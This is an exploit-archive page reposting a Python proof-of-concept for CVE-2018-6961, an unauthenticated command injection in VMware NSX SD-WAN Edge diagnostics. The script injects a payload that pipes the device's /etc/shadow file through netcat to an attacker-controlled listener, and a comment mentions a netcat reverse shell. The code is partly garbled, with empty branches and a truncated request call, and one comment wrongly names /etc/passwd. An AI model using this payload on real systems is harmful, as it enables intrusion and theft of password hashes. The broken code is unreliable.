
VMware NSX SD-WAN Edge Command Injection

CVE Category Price Severity
CVE-2018-6961 CWE-78 Not specified High
Author Risk Exploitation Type Date
VerSprite High Remote 2018-07-03
Our sensors found this exploit at:

Below is a copy:

VMware NSX SD-WAN Edge Command Injection
#!/usr/bin/env python
# Exploit Title: Unauthenticated Command Injection vulnerability in VMware NSX SD-WAN by VeloCloud
# Date: 2018-06-29
# Exploit Author: paragonsec @ Critical Start
# Credit: Brian Sullivan from Tevora and Section 8 @ Critical Start
# Vendor Homepage:
# Security Advisory:
# Version: 3.1.1 
# CVE: CVE-2018-6961
import argparse
import requests
import sys
import collections
This script will return execute whatever payload you placed within it. 
Keep in mind that SD-WAN is running a slimmed down Linux version so obtaining a reverse shell isn't as simple as nc -e /bin/bash blah blah
The command within this script will send stdout of commands to your netcat listener. Feel free to change :)
OKRED = '\033[91m'
OKGREEN = '\033[92m'
ENDC = '\033[0m'
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument("--source", help = "Victim WAN Interface (e.g ge1, ge2)")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument('--func', help = 'Function to abuse (e.g traceroute, ping, dns)')
args = parser.parse_args()
# Check to ensure at least one argument has been passed
if len(sys.argv)==1:
rhost = args.rhost
source = args.source
lhost = args.lhost
lport = args.lport
func = args.func
# Payload to be sent to the victim. Change to whatever you like!
# This payload will cat /etc/passwd from fictim and pipe it into a netcat connection to your listener giving you the contents of /etc/passwd
payload = "$(cat /etc/shadow |nc " + lhost + " " + lport + ")"
exploit_url = "http://" + rhost + "/scripts/ajaxPortal.lua"
headers = [
    ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
    ('Accept', 'application/json, text/javascript, */*; q=0.01'),
    ('Accept-Language', 'en-US,en;q=0.5'),
    ('Accept-Encoding', 'gzip, deflate'),
    ('Referer','http://' + rhost + '/'),
    ('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8'),
    ('X-Requested-With', 'XMLHttpRequest'),
    ('Cookie', 'culture=en-us'),
    ('Connection', 'close')
# probably not necessary but did it anyways
headers = collections.OrderedDict(headers)
# Setting up POST body parameters
if func == 'traceroute':
    body = "destination=" + payload + "&source=" + source + "&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic"
elif func == 'dns':
    body = "" + payload + "&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic"
    body = "destination=" + payload + "&source=" + source + "&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic"
print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (")
print(OKGREEN + "Credits: " + ENDC + "Brian Sullivan @ Tevora and Section 8 team @ Critical Start")
print(OKGREEN + "CVE: " + ENDC + "2018-6961")
print(OKGREEN + "Description: " + ENDC + "Multiple Unauthenticated Command Injection Vulnerabilities in VeloCloud SD-WAN GUI Application\n")
print(OKGREEN + "[+]" + ENDC + "Running exploit...")
s = requests.Session()
req =, headers=headers, data=body)
if "UNKNOWN_COMMAND" not in req.text:
    print(OKGREEN + "[+]" + ENDC + "Exploit worked. Check listener!")
    print(OKRED + "[!]" + ENDC + "Exploit failed. You lose!")

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